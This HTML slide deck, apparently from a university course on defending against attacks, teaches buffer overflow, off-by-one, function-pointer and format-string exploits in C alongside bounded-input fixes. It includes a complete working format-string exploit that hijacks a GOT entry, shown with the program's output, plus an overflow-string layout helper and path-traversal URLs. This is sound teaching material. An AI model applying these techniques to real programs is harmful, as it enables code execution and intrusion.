<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
  <title>DADA: Exploits</title>
  <link rel="stylesheet" href="reveal.js/css/reveal.css">
  <link rel="stylesheet" href="reveal.js/css/theme/black.css">
  <link rel="stylesheet" href="dada.css">
  <!-- Theme used for syntax highlighting of code -->
  <link rel="stylesheet" href="reveal.js/lib/css/zenburn.css">
  <!-- Printing and PDF exports -->
  <script>
    var link = document.createElement( 'link' );
    link.rel = 'stylesheet';
    link.type = 'text/css';
    link.href = window.location.search.match( /print-pdf/gi ) ? 'css/print/pdf.css' : 'css/print/paper.css';
    document.getElementsByTagName( 'head' )[0].appendChild( link );
  </script>
</head>

<body>
  <div class="reveal">
    <div class="slides">

      <section data-markdown id="cover"><script type="text/template">
# CS 4630
&nbsp;
### Defense Against the Dark Arts
&nbsp;
<center><small>[Aaron Bloomfield](http://www.cs.virginia.edu/~asb) / [aaron@virginia.edu](mailto:aaron@virginia.edu) / [@bloomfieldaaron](http://twitter.com/bloomfieldaaron)</small></center>
<center><small>Repository: [github.com/aaronbloomfield/dada](http://github.com/aaronbloomfield/dada) / [&uarr;](index.html) / <a href="?print-pdf"><img class="print" width="20" src="images/print-icon.png"></a></small></center>
&nbsp;  
&nbsp;
## Exploits
  </script></section>

	<section data-markdown><textarea data-template>
# Contents
&nbsp;  
[1st Generation Exploits](#/firstgen)  
[2nd Generation Exploits](#/secondgen)  
[3rd Generation Exploits](#/thirdgen)  
[Miscellaneous Vulnerabilities](#/miscvul)  
[Safe and Unsafe Coding](#/safeandunsafe)  
[Defenses](#/defenses)  
	</textarea></section>

	<section>
      
	  <section data-markdown id="firstgen"><textarea data-template>
# 1st Generation Exploits
	  </textarea></section>
	  
	  <section data-markdown data-separator="^\n$"><textarea data-template>
## Vulnerabilities and Exploits
- *Vulnerability* is often used to refer only to vulnerable code in an OS or applications
- More generally, a vulnerability is whatever weakness in an overall system makes it open to attack
- An attack that was designed to target a known vulnerability is an *exploit* of that vulnerability


## Varieties of Vulnerabilities
- Buffer overflow on stack
  - Primarily used to overwrite the return address
- Buffer overflow on heap
  - Return addresses are not on the heap
  - Other pointers are on the heap and can be overwritten, e.g. function & file pointers
- Format string attacks
- Memory management attacks
- Failure to validate input
- URL encoding failures; ... the list goes on


## Classifying Vulnerabilities
- Szor classifies vulnerabilities and exploits by generation
- First generation: Stack buffer overflow
- Second generation:
	- Off by one overflows, heap overflows, file pointer overwriting, function pointer overwriting
- Third generation
	- Format string attacks, memory (heap) management attacks
	- ... the list is lengthy


## First Generation Exploits
- *Buffer overflow* is the most common exploit
  - Array bounds not usually checked at run time
- What comes *after* the buffer being overflowed determines what can be attacked
	- The return address is on the stack at a known offset after the last local variable
	- Return address can be changed to cause a return to malicious code
- Buffer overflows are easy to guard against, yet they remain the most common code vulnerability


## Stack Buffer Overflow Example
```
#include <stdio.h>
void process_data(char *data);   // Defined elsewhere

void bogus(void) {
   int i;
   char buffer[256];      // Return address follows!

   printf("Enter your data as a string.\n");
   scanf("%s", buffer);   // No bounds check!

   process_data(buffer);
   return;
   // Returns to the return address that follows
   // buffer[] on the stack frame
}
```


## Stack Buffer Overflow cont'd
<!-- .slide: class="right-float-img-1000" -->
![stack diagram](images/exploits/stack-buffer-overflow-1.png)
In the stack frame for `bogus()`, the return address is right above the saved frame pointer, which is right above `buffer[260]`

In the 64-bit calling convention, there (usually) is no saved frame pointer


## Stack Buffer Overflow cont'd.
- Notice that the program does not check to make sure that the user inputs 255 characters or less
- Source code is available for many operating systems and applications (or, they can be reverse engineered)
- Attacker can see that it is possible to overflow the buffer
- Buffer is last data item on the stack frame; the return address from this function will be at a defined distance after it
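- The missing check can be added with a field width on `%s`. Here is a minimal sketch, assuming the input is already in a string (so `sscanf()` stands in for `scanf()`). `read_bounded()` is a hypothetical helper:
```c
#include <stdio.h>

/* Hypothetical helper: copies at most 255 non-whitespace characters
 * from input into buffer, always leaving room for the '\0'.
 * Returns 1 on success, 0 or EOF if nothing was read. */
int read_bounded(const char *input, char buffer[256]) {
    /* The field width 255 stops the copy before buffer[255],
     * which receives the terminating '\0' */
    return sscanf(input, "%255s", buffer);
}
```
- In `bogus()` itself, `scanf("%255s", buffer)` applies the same limit. The width has to be kept in sync with the buffer size by hand.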


## Stack Buffer Overflow cont'd.
- Attacker can enter a character string representation of his malicious object code, long enough to fill the buffer
- At the end of the malicious code, the attacker passes the address of variable "buffer" so that it overwrites the return address of function `bogus()` on the stack frame
- When `bogus()` returns, it will cause a return to the buffer address, executing the malicious code in it
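- Here is a sketch of how such an overflow string could be laid out. It assumes a 32-bit little-endian target and a known distance `offset` from `buffer[0]` to the saved return address (for example, 256 bytes of `buffer` plus 4 for the saved frame pointer, if nothing else sits between them). `layout_overflow()` and all values are hypothetical:
```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: builds an overflow string in out[] of length
 * offset + 4. Bytes [0, code_len) are the injected code, bytes
 * [code_len, offset) are filler, and the last 4 bytes hold ret_addr
 * in little-endian order so they land on the saved return address.
 * Requires code_len <= offset and out to hold offset + 4 bytes. */
size_t layout_overflow(unsigned char *out, const unsigned char *code,
                       size_t code_len, size_t offset, uint32_t ret_addr) {
    memcpy(out, code, code_len);
    memset(out + code_len, 'A', offset - code_len);   /* filler */
    for (size_t i = 0; i < 4; i++)                    /* low byte first */
        out[offset + i] = (unsigned char)(ret_addr >> (8 * i));
    return offset + 4;
}
```
- `scanf("%s")` stops at whitespace, so the real bytes (code, filler, and address) must avoid values such as 0x20 and 0x0a.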


## Stack Buffer Overflow cont'd.
<!-- .slide: class="right-float-img-1000" -->
![stack diagram](images/exploits/stack-buffer-overflow-2.png)
`bogus()` is now "returning" to `buffer[0]`
	  </textarea></section>

	</section>
      
	<section>
      
	  <section data-markdown id="secondgen"><textarea data-template>
# 2nd Generation Exploits
	  </textarea></section>
	  
	  <section data-markdown data-separator="^\n$"><textarea data-template>
## Heap Buffer Overflow
- Example: overwriting a file pointer
```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char **argv) {
    int ch = 0, i = 0;
    FILE *f = NULL;
    static char buffer[16], *szFileName = "C:\\harmless.txt";
    ch = getchar();
    while (ch != EOF) { /* User input can overflow buffer[] */
      buffer[i++] = ch;
      ch = getchar();
    }
    f = fopen(szFileName, "w+b"); /* might be modified! */
    fputs(buffer, f);
    fclose(f);
    return 0;
}
```


## Heap Buffer Overflow
- Examine the key lines of the example code:
```
static char buffer[16], *szFileName =
                   "C:\\harmless.txt";
```
- Both variables are static, so they are stored in the program's global data area (which Szor calls the global heap) rather than on the stack. The attack assumes the compiler places them consecutively.
- When `buffer[]` is overflowed with keyboard input, it will overwrite `szFileName`:
```
while (ch != EOF) { // User input can overflow buffer
    buffer[i++] = ch;
    ch = getchar();
}
```
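- One way to close the hole is to move the loop into a helper that takes the stream and the buffer size as parameters. This is a sketch, and `read_input()` is a hypothetical name:
```c
#include <stdio.h>

/* Bounded replacement for the getchar() loop: stores at most
 * size - 1 characters from in, then '\0'-terminates buffer.
 * Returns the number of characters stored (size must be >= 1). */
size_t read_input(FILE *in, char *buffer, size_t size) {
    size_t i = 0;
    int ch;
    /* Test the bound before reading and storing each character */
    while (i + 1 < size && (ch = getc(in)) != EOF)
        buffer[i++] = (char)ch;
    buffer[i] = '\0';
    return i;
}
```
- In the example, `read_input(stdin, buffer, sizeof buffer)` would replace the `getchar()` loop, so input can no longer reach `szFileName`.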


## Heap Buffer Overflow
- An attacker who can compile the code and dump it to figure out addresses can now make `szFileName` point anywhere he wants
- For example, he could make it point to `argv[1]`; this means he can pass in a file name on the command line!
- So, the attacker passes in `C:\autoexec.bat` or some other protected system file name on the command line; if this program is a system utility that runs with admin privileges, the system file can be overwritten


## Off by One Attack
- The C language starts array indices at zero, which is not always intuitive for beginning programmers
- This often leads to off-by-one errors in code that fills a buffer
```
void vuln(char *foobar) {
    int i;
    char buffer[512];
    for (i = 0; i <= 512; ++i) // Should be <, not <=
      buffer[i] = foobar[i];
}
int main(int argc, char *argv[]) {
    if (2 == argc)
      vuln(argv[1]);
    return 0;
}
```


## Off by One Attack
- How much damage could a one-byte exploit cause?
- The return address is NOT located just past the local variables on the x86 stack frame
  - There is a saved EBP location between them (the frame pointer)
- The attacker cannot directly alter the return address
- S/he *can* alter the lowest (least significant) byte of the saved EBP


## Off by One Attack
- When the vulnerable function returns, the calling function will now have a bogus stack frame
  - This bogus stack frame can be arranged to lie within the buffer that was partly filled with malicious code
  - When the caller of the vulnerable function returns, it will return into the start of the malicious code section of the buffer


## Off by One Stack Frame
- The caller of the vulnerable function ends up returning to a fake return address (inside buffer):
  - The 512 bytes of `buffer[]` received malicious code, plus a bogus stack frame, from the command-line argument `argv[1]`
  - Byte 513 of the argument became the new lowest byte of the valid saved EBP
	- It is the lowest byte because the x86 is little-endian
	- This places the caller's stack frame inside `buffer[]`
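- The following small simulation of that single-byte write assumes a little-endian host such as x86. `overwrite_first_byte()` is a hypothetical helper:
```c
#include <stdint.h>
#include <string.h>

/* Simulates the one-byte overflow: the byte written just past
 * buffer[] lands on the *first* byte in memory of the saved EBP.
 * On a little-endian machine (x86) that is the least significant
 * byte, so only the low 8 bits of the frame pointer change. */
uint32_t overwrite_first_byte(uint32_t saved_ebp, unsigned char b) {
    unsigned char bytes[sizeof saved_ebp];
    memcpy(bytes, &saved_ebp, sizeof saved_ebp);  /* in-memory byte order */
    bytes[0] = b;                                 /* the 513th byte */
    memcpy(&saved_ebp, bytes, sizeof saved_ebp);
    return saved_ebp;
}
```
- For example, take a hypothetical saved EBP of 0xbffff8c8 and a 513th byte of 0x10. The caller's frame pointer becomes 0xbffff810, which is 0xb8 bytes lower and can land inside `buffer[]`.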


## Off by One Stack Frame
<!-- .slide: class="max-image-height-500" -->
![off by one attack](images/exploits/off-by-one.png)


## Off by One: Real Examples
- [Nestea IP frame off-by-one denial of service attack](http://www.insecure.org/sploits/linux.PalmOS.nestea.html)
- [Linux fileutils "ls" command off-by-one memory exhaustion attack (system crashes)](http://www.linuxsecurity.com/content/view/105485/105/)  (registration required)
- [Middleman printer proxy server Linux attack](http://www.linuxdevcenter.com/pub/a/linux/2003/01/13/insecurities.html#mid)


## Function Pointer Overwriting
- A system utility could have a function pointer to a callback function, declared after a buffer (Szor, Listing 10.5)
- Overflowing the buffer overwrites the function pointer
- By determining the address of `system()` on this machine, an attacker can cause `system()` to be called instead of the callback function
- [Macromedia Flash example](http://www.securiteam.com/windowsntfocus/6W00J00EKQ.html)
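- The following hypothetical layout is in the spirit of that listing, not Szor's actual code. It uses a `struct` because C guarantees that members appear in declaration order, whereas the placement of separate local variables is up to the compiler:
```c
#include <stddef.h>
#include <string.h>

/* Hypothetical state for a system utility: a callback pointer
 * declared right after a fixed-size buffer. */
struct utility_state {
    char buffer[64];
    void (*callback)(const char *);
};

/* Distance from buffer[0] to the function pointer: an unchecked
 * copy longer than this starts overwriting callback. */
size_t bytes_until_callback(void) {
    return offsetof(struct utility_state, callback);
}

/* Bounded copy: never writes past buffer[], so callback survives */
void set_buffer(struct utility_state *s, const char *input) {
    strncpy(s->buffer, input, sizeof s->buffer - 1);
    s->buffer[sizeof s->buffer - 1] = '\0';
}
```
- An unchecked copy of more than `bytes_until_callback()` bytes into `buffer` would overwrite `callback`. The bounded `set_buffer()` cannot do so.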
	  </textarea></section>

	</section>
      
	<section>
      
	  <section data-markdown id="thirdgen"><textarea data-template>
# 3rd Generation Exploits
	  </textarea></section>
	  
	  <section data-markdown data-separator="^\n$"><textarea data-template>
## Format String Attacks
- Many C library functions produce formatted output using format strings
  - e.g. `printf()`, `fprintf()`, `wprintf()`, `sprintf()`, etc.
- These functions permit strings that have no format control to be printed (unfortunately):
```
char buffer[14] = "Hello, world!";  /* 13 chars + '\0' */
printf(buffer);        /* Bad programmer! */
printf("%s", buffer);  /* Good programmer! */
```


## Format String Attacks
- Consider:
```
char buffer[14] = "Hello, world!";
printf(buffer);        /* Bad programmer! */
```
- The format string (1st parameter to `printf()`) is not a fixed string
- This creates the possibility that an attacker will pass a format string rather than a plain string to print, which can be used to read from and write to memory
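- Here is a minimal sketch of the safe pattern. It uses `snprintf()` so the result can be inspected, and `render_safely()` is a hypothetical helper. The untrusted text is only ever an *argument*, never the format string:
```c
#include <stdio.h>

/* Copies untrusted text into out using a fixed format string.
 * Any '%' sequences in user_text are treated as plain data by
 * "%s", so they are copied instead of interpreted. */
int render_safely(char *out, size_t size, const char *user_text) {
    return snprintf(out, size, "%s", user_text);
}
```
- The `%x` and `%n` in the input come out as literal text instead of reading or writing memory.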


## Format String Attack Example
Source code: [vuln.c](code/exploits/vuln.c) ([html](code/exploits/vuln.c.html))
```
#include <stdio.h>
#include <string.h>
void vuln(char buffer[256]) {
  printf(buffer); 
  /* Bad; good would be: printf("%s",buffer) */
}
int main(int argc, char *argv[]) {
   char buffer[256] = "";  /* allocate buffer */
   if (2 == argc)  /* copy command line */
      strncpy(buffer, argv[1], 255);
   vuln(buffer);
   return 0;
}
```
- The included [Makefile](code/exploits/Makefile) compiles this to `vuln-32bit.exe` and `vuln-64bit.exe`
- What if the user passes `%x` on the command line?


## Format String Attack Example
- For sanity's sake, we will probably want to run it via:
```
setarch x86_64 -v -LR vuln-32bit.exe
setarch x86_64 -v -LR vuln-64bit.exe
```
- This isn't necessary, but it will make our lives easier
  - Since the addresses will be the same each time we run it
- And when run on the Ubuntu 16.04 VirtualBox image, your execution should match the examples in this slide set


## Format String Attack Example
- If the user passes `%x` on the command line, then `printf()` will receive a pointer to a string with `"%x"` in it on the stack
- `printf()` will see the `%x` and assume there is another parameter above it on the stack
- Whatever is above it on the stack will be printed in hexadecimal
- The next diagram shows the difference between correct and incorrect uses of `printf()`


## Example: Uses of printf()
- Immediately after the call to `printf()`, but before the prologue code in `printf()`:
![format string attack](images/exploits/format-string-attack-1.png)
- This is the 32-bit version


## Example: Uses of printf()
- For the 64-bit version:
  - The return addresses are still on the stack
	- 0x4005f3 from `printf()` to `vuln()`
	- 0x40067c from `vuln()` to `main()`
  - The parameters are in registers (rdi for the first, rsi for the second, etc.)
- Note that, in both cases, there may be other values between the stack values shown


## Format String Attack Example
- In the bad code, whatever is above `%x` on the stack will be printed in hexadecimal
  - Attacker can use `%x%x%x`, etc., to display the stack contents and figure out return addresses
- An attacker who can use an interactive utility can determine the exact address where his malicious code will be placed, where the return address is, and therefore what value to use to overwrite the return address


## Positioning Within the Stack
- If an attacker wants to skip over 32 bytes in the stack, he can supply 8 `%x` fields in the format string on the command line:
```
vuln-32bit.exe %x%x%x%x%x%x%x%x%s
vuln-64bit.exe %x%x%x%x%x%x%x%x%s
```
- The format string causes 8 ints to be printed off the stack in hex, using the `%x` specifiers, then prints a string (using `%s`) starting at the next stack position


## Positioning Within the Stack
- Some better formatting tips:
  - One can use `%.8x` to ensure all values are printed with 8 digits
  - Or `%.16lx` for the 64-bit version
  - And put commas between
- To print 6 hex values:
```
vuln-32bit.exe %.8x,%.8x,%.8x,%.8x,%.8x,%.8x
vuln-64bit.exe %.16lx,%.16lx,%.16lx,%.16lx,%.16lx,%.16lx
```


## Overwriting Within the Stack
- The format string can also be used to force `printf()` to write to memory via `%n`:
```
printf("foobar%n", &nBytesWritten);
```
  - This prints "foobar", writes 6 to `nBytesWritten`
  - We can also use `%hn` for a short, or `%ln` for a long
- Attacker can supply address to write to:
```
vuln-32bit.exe 0x12FE7C%x%x%n
```
  - We'll see how this works next...
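- The following small sketch shows what `%n` stores, using `snprintf()` into a local buffer. The helper names are hypothetical, and some hardened C libraries restrict or reject `%n`:
```c
#include <stdio.h>

/* %n stores the number of characters output so far by this call */
int count_foobar(void) {
    char out[16];
    int n = 0;
    snprintf(out, sizeof out, "foobar%n", &n);   /* n becomes 6 */
    return n;
}

/* Precision padding counts too: %c%c prints 2 characters and
 * %.5u prints "00007" (5 digits), so %n stores 7 */
int count_padded(void) {
    char out[16];
    int n = 0;
    snprintf(out, sizeof out, "%c%c%.5u%n", 'a', 'b', 7u, &n);
    return n;
}
```
- The attack relies on the mechanism in the second case: padding such as `%.5u` inflates the count without the attacker having to supply that many characters.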


## A vulnerability
Consider the [exploitable.c](code/exploits/exploitable.c) ([html](code/exploits/exploitable.c.html)) code:
```
#include <stdio.h>
#include <stdlib.h>
int exploited() {
  printf("Got here!\n");
  exit(0);
}
  
int main(void) {
  char buffer[100];
  while (fgets(buffer, sizeof buffer, stdin)) {
    printf(buffer);
  }
  return 0;
}
```
- Can we supply a string such that `exploited()` will be called?


## Where are we going?  And why are we in this handbasket?
- First, we need to get the address of `fgets()` and also `exploited()`
  - We want to change a call to `fgets()` into a call to `exploited()`
- We can get that through `objdump`


## `objdump -d exploitable.exe`
<pre class="code">
exploitable.exe:     file format elf64-x86-64
  
Disassembly of section .init:
...
0000000000400580 < fgets@plt >:
  400580:	ff 25 b2 0a 20 00    	jmpq   *0x200ab2(%rip)        # <span class='red'>601038</span> <_GLOBAL_OFFSET_TABLE_+0x38>
  400586:	68 04 00 00 00       	pushq  $0x4
  40058b:	e9 a0 ff ff ff       	jmpq   400530 <_init+0x20>
  
0000000000<span class='red'>4006a6</span> < exploited >:
  4006a6:	55                   	push   %rbp
...
</pre>

- The address of `exploited()` is 0x4006a6
- The address of the pointer to `fgets()` is 0x601038
  - Scroll the code window to the right to see this


## A bit more background
- `exploited()` address 0x4006a6 is 4,196,006 in decimal
- Recall that parameter 1 will be in rdi, and it will be a pointer to the buffer
- Single-character specifiers, such as `%c`, still "read" 8 bytes from the stack, but print out only one character


## Faking printf() parameters
![format string attack](images/exploits/format-string-attack-2.png)


## Creating the exploit
- The goal:
  - Have 5 specifiers to "burn" the values in the registers
  - Generate the address for `exploited()` by printing 0x4006a6 = 4,196,006 bytes to stdout (!)
  - Overwrite the `fgets()` address by writing that value to address 0x601038
- Our format string will contain:
  - A whole bunch of specifiers
  - The address, in hex, of `fgets()`: 0x601038


## Parts of the puzzle
- To "burn" the five registers, we'll print them as characters:
```
%c%c%c%c%c
```
- To print many characters, we'll use an unsigned int specifier with a large number of digits
```
%.4196006u
```
  - (that number will change slightly)
  - Once we've printed out about 4 MB of characters, we can write that count as a pointer to memory


## The result
<pre class="code">
<span class="springgreen">%c%c%c%c%c</span><span class="darkkhaki">%c%c%c</span><span class="coral">%.4195998u</span><span class="darkgray">%ln</span><span class="lightskyblue">???</span><span class="palevioletred">0x601038</span>
</pre>
- <span class="springgreen">%c%c%c%c%c</span> "burns" the registers
- <span class="darkkhaki">%c%c%c</span> moves forward 3 "spots" (24 bytes)
- <span class="coral">%.4195998u</span> writes most of the 4 MB of characters
- <span class="darkgray">%ln</span> writes the value to memory
- <span class="lightskyblue">???</span> aligns the text so far to 32 bytes
- <span class="palevioletred">0x601038</span> is the address to write to
	- It's provided as binary, not the text shown


## Analysis
<pre class="code">
<span class="springgreen">%c%c%c%c%c</span><span class="darkkhaki">%c%c%c</span><span class="coral">%.4195998u</span><span class="darkgray">%ln</span><span class="lightskyblue">???</span><span class="palevioletred">0x601038</span>
</pre>
- Total bytes written to stdout:
  - 5 from <span class="springgreen">%c%c%c%c%c</span>
  - 3 from <span class="darkkhaki">%c%c%c</span>
  - 4,195,998 from <span class="coral">%.4195998u</span>
- Total is 4,196,006
  - In hex, that's 0x4006a6
- This is the value written by <span class="darkgray">%ln</span> as an 8-byte value
  - Since <span class="darkgray">%ln</span> writes as a `long`
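- The same arithmetic can be written as a sketch, where `pad_precision()` is hypothetical. It assumes the value printed by `%.Nu` has at most N digits, so exactly N characters come out:
```c
/* Precision N for the large %.Nu field so that the running count
 * equals target when %ln executes. already = characters printed
 * before that field (5 + 3 = 8 from the %c specifiers here). */
unsigned long pad_precision(unsigned long target, unsigned long already) {
    return target - already;
}
```
- Here the value printed is 1,814,394,168 (10 digits), well under 4,195,998 digits, so the assumption holds.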


## Analysis
<pre class="code">
<span class="springgreen">%c%c%c%c%c</span><span class="darkkhaki">%c%c%c</span><span class="coral">%.4195998u</span><span class="darkgray">%ln</span><span class="lightskyblue">???</span><span class="palevioletred">0x601038</span>
</pre>
- How does <span class="darkgray">%ln</span> get the address?
- `printf()` sees 4 "values" on the stack (after burning the registers):
  - The 1st <span class="darkkhaki">%c</span> reads the first 8 bytes: <span class="springgreen">%c%c%c%c</span>
  - The 2nd <span class="darkkhaki">%c</span> reads the next 8 bytes: <span class="springgreen">%c</span><span class="darkkhaki">%c%c%c</span>
  - The 3rd <span class="darkkhaki">%c</span> reads the next 8 bytes: <span class="coral">%.419599</span>
  - The <span class="coral">%.4195998u</span> reads the next 8 bytes: <span class="coral">8u</span><span class="darkgray">%ln</span><span class="lightskyblue">???</span> (and interprets it as an unsigned)
- Thus, when it's time to find the address for <span class="darkgray">%ln</span>, what is read is <span class="palevioletred">0x601038</span>
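- The following sketch slices the 32-byte format string into the 8-byte slots that `printf()` walks through. `stack_slot()` is hypothetical, and slot 0 is assumed to be the first stack argument `printf()` reads after the five registers:
```c
#include <stddef.h>
#include <string.h>

/* Copies the k-th 8-byte "stack slot" of fmt into out as a string,
 * mimicking how printf() fetches each 64-bit argument from
 * consecutive 8-byte positions in buffer[].
 * Requires fmt to hold at least 8 * (k + 1) bytes. */
void stack_slot(const char *fmt, size_t k, char out[9]) {
    memcpy(out, fmt + 8 * k, 8);
    out[8] = '\0';
}
```
- Slots 2 and 3 match the bullets above. Slot 4 holds the 8 bytes that follow `???`, which is where the binary address 0x601038 sits.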


## The result
Consider the [attack.c](code/exploits/attack.c) ([html](code/exploits/attack.c.html)) code:
```
#include <stdio.h>
int main() {
  /* advance through 5 registers, then 4 * 8 = 32 bytes
   * down stack, outputting 4195998 + 8 characters 
   * before using %ln to store a long. Then pad that
   * to 32 bytes of text. */
  fputs("%c%c%c%c%c%c%c%c%.4195998u%ln???", stdout);
  /* write pointer value, which will include \0s */
  void *ptr = (void*) 0x601038;
  fwrite(&ptr, 1, sizeof(ptr), stdout);
  fputs("\n", stdout);
  return 0;
}
```
- Note that we have to use `fwrite()`, since we are writing binary data


## Output analysis
<pre class="codesmall">
$ ./exploitable.exe < attack.out  > exploitable.out
$ hexdump -C exploitable.out
00000000  39 90 0a 39 38 25 25 25  30 30 30 30 30 30 30 30  |9..98%%%00000000|
00000010  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30  |0000000000000000|
*
00400690  30 30 30 30 30 30 30 30  30 30 30 30 31 38 31 34  |0000000000001814|
004006a0  33 39 34 31 36 38 3f 3f  3f 38 10 60 47 6f 74 20  |394168???8.`Got |
004006b0  68 65 72 65 21 0a                                 |here!.|
004006b6
$
</pre>
- The first 5 bytes are the parameter registers as chars
- The next three bytes come from the format string itself, printed as chars (each is the `%` that begins an 8-byte chunk)
- The next 4,195,998 bytes are the end of the format string interpreted as an unsigned
  - The value is 1,814,394,168, with a *lot* of leading 0's
  - Note that `hexdump -C` collapses the many identical lines of 0's into a single `*`


## Output analysis
<pre class="codesmall">
$ ./exploitable.exe < attack.out  > exploitable.out
$ hexdump -C exploitable.out
00000000  39 90 0a 39 38 25 25 25  30 30 30 30 30 30 30 30  |9..98%%%00000000|
00000010  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30  |0000000000000000|
*
00400690  30 30 30 30 30 30 30 30  30 30 30 30 31 38 31 34  |0000000000001814|
004006a0  33 39 34 31 36 38 3f 3f  3f 38 10 60 47 6f 74 20  |394168???8.`Got |
004006b0  68 65 72 65 21 0a                                 |here!.|
004006b6
$
</pre>
- The next three ?'s are the padding from the source code
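- The address, in binary, is printed next as 3 characters (0x38 0x10 0x60, little-endian). `printf()` stops at the first zero byte of the address, which ends the format string.
- The end of the output is the "Got here!\n" printed by the `exploited()` function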


## Writing an Arbitrary Value
- Some modern C libraries do not permit huge width specifiers, so 0x601038 cannot always be written using a single `%n` field
  - An attacker can work around this defense by writing 0x601038 as three separate bytes: 0x60, 0x10, and 0x38, to three consecutive byte locations that overwrite the old return address, using three `%n` fields on the command line
- Only works on a machine such as the x86 that permits unaligned byte stores to memory


## Example
- We want to:
  - Write 1000 (short) (equals 0x3e8) to address 0x1234567890ABCDEF
  - Write 2000 (short) (equals 0x7d0) to address 0x1234567890ABCDF1
  - We "know" that the buffer starts 16 bytes above `printf()` return address
- The result:
<pre class="code">
<span class="springgreen">%c%c%c%c%c</span><span class="darkkhaki">%c%c%c%c%.991u</span><span class="coral">%hn</span><span class="darkgray">%.1000u</span><span class="lightskyblue">%hn</span>
</pre>


## Example
<pre class="code">
<span class="springgreen">%c%c%c%c%c</span><span class="darkkhaki">%c%c%c%c%.991u</span><span class="coral">%hn</span><span class="darkgray">%.1000u</span><span class="lightskyblue">%hn</span>
</pre>
- <span class="springgreen">%c%c%c%c%c</span>: skip over registers
- <span class="darkkhaki">%c%c%c%c%.991u</span>: skip to format string buffer, past format part
  - 9 + 991 chars is 1000
- <span class="coral">%hn</span>: write to first pointer
- <span class="darkgray">%.1000u</span>: 1000 + 1000 = 2000
- <span class="lightskyblue">%hn</span>: write to second pointer
- (note that we haven't shown the rest of the format string, which would contain the addresses for the two <span class="coral">%hn</span> specifiers)
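- The following sketch shows the general rule for choosing each padding width, where `next_pad()` is hypothetical. `%hn` stores the count modulo 65536 (and `%hhn` modulo 256), so when a later value is smaller, the count can simply wrap around:
```c
/* Characters to print next (the N in %.Nu) so the running count moves
 * from `printed` to a value whose low bits equal `target`.
 * modulus is 65536 for %hn, 256 for %hhn; assumes target < modulus. */
unsigned long next_pad(unsigned long printed, unsigned long target,
                       unsigned long modulus) {
    return (target - printed % modulus + modulus) % modulus;
}
```
- `next_pad(9, 1000, 65536)` gives 991 and `next_pad(1000, 2000, 65536)` gives 1000, matching the format string above. As with `%.991u`, each width assumes the number being printed has no more digits than the precision.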


## Heap Management
- A heap allocation (e.g. via `malloc()`) allocates a small control block, with pointer and size fields, just before the memory that is allocated
- An attacker can underflow the heap memory allocated (in the absence of proper bounds checking, or with pointer arithmetic) and overwrite the control block
- The heap management software will now use the overwritten memory pointer info in the control block, and can thus be redirected to write to arbitrary memory addresses
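- The following toy allocator makes the layout concrete. `struct block_header`, `toy_malloc()`, and `header_of()` are hypothetical, and real allocators such as glibc's `malloc()` use different, more elaborate control blocks:
```c
#include <stddef.h>

/* Hypothetical control block for a toy allocator */
struct block_header {
    size_t size;                 /* bytes usable by the caller */
    struct block_header *next;   /* link used by the allocator */
};

#define ARENA_UNITS 64
static struct block_header arena[ARENA_UNITS];  /* toy "heap" */
static size_t arena_used = 0;                   /* units handed out */

/* Bump allocator: writes a header, then returns the memory that
 * immediately follows it. Sizes are rounded up to whole units. */
void *toy_malloc(size_t size) {
    size_t units = (size + sizeof(struct block_header) - 1)
                   / sizeof(struct block_header);
    if (1 + units > ARENA_UNITS - arena_used) return NULL;
    struct block_header *h = &arena[arena_used];
    h->size = units * sizeof(struct block_header);
    h->next = NULL;
    arena_used += 1 + units;
    return h + 1;            /* caller's memory starts right after h */
}

/* The header lies just below the caller's pointer */
struct block_header *header_of(void *p) {
    return (struct block_header *)p - 1;
}
```
- Writing before `p[0]` (an underflow) lands in `size` and `next`. A real allocator that later trusts those fields can be steered into writing wherever they point.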


## Input Validation Failures
- There are numerous ways in which an application program can fail to validate user input
- We will examine the two failures that are most important in the Internet age:
	- URL encoding and canonicalization
	- MIME header parsing


## URL Encoding and Canonicalization
- The following URLs represent the same image file:
  - http://domain.tld/user/foo.gif
  - http://domain.tld/user/bar/../foo.gif
- Canonicalization converts URLs into a standard form
  - The 2nd URL above would be converted to the 1st
- Szor, p. 385: "A URL canonicalization vulnerability occurs when a security decision is based on a URL and not all of the URL representations are taken into account."


## URL Encoding and Canonicalization
- Suppose a web server only allows external access to the /user subdirectories, but does not canonicalize URLs before checking them:
  - http://domain.tld/user/index.html         (legal)
  - http://domain.tld/passwords.txt           (illegal)
  - http://domain.tld/user/../passwords.txt   (canonicalization exploit)
- After many such exploits, server software began searching for ".." and converting URLs to canonical form
- However, character encoding permitted canonicalization exploits to continue
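- The fix is to canonicalize first, then make the security decision on the canonical form. In this sketch, `canonicalize()` and `allowed()` are hypothetical, and both assume percent-decoding has already happened:
```c
#include <stdbool.h>
#include <string.h>

/* Resolves "." and ".." segments of a path such as "/user/../x".
 * out must hold strlen(path) + 2 bytes. Returns false if ".."
 * would climb above the root. */
bool canonicalize(const char *path, char *out) {
    size_t len = 0;                    /* length of out so far */
    out[0] = '\0';
    while (*path) {
        while (*path == '/') path++;   /* skip separators */
        const char *seg = path;
        while (*path && *path != '/') path++;
        size_t n = (size_t)(path - seg);
        if (n == 0 || (n == 1 && seg[0] == '.'))
            continue;                  /* empty or "." segment */
        if (n == 2 && seg[0] == '.' && seg[1] == '.') {
            if (len == 0) return false;          /* above the root */
            while (len > 0 && out[len - 1] != '/') len--;
            len--;                     /* drop the '/' as well */
            out[len] = '\0';
            continue;
        }
        out[len++] = '/';              /* append "/segment" */
        memcpy(out + len, seg, n);
        len += n;
        out[len] = '\0';
    }
    if (len == 0) { out[0] = '/'; out[1] = '\0'; }
    return true;
}

/* Security decision made on the canonical form, not the raw URL */
bool allowed(const char *path) {
    char canon[256];
    if (strlen(path) + 2 > sizeof canon) return false;
    if (!canonicalize(path, canon)) return false;
    return strncmp(canon, "/user/", 6) == 0;
}
```
- `allowed("/user/../passwords.txt")` is rejected because the canonical form is `/passwords.txt`. By contrast, `/user/bar/../foo.gif` becomes `/user/foo.gif` and is allowed.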


## URL Character Encoding
- Web servers decode percent-encoded bytes (e.g. `%2F` represents a forward slash), and most interpret the decoded bytes as UTF-8
- Encoding rules:
  - 0-7 bits: input xxxxxxx becomes 0xxxxxxx
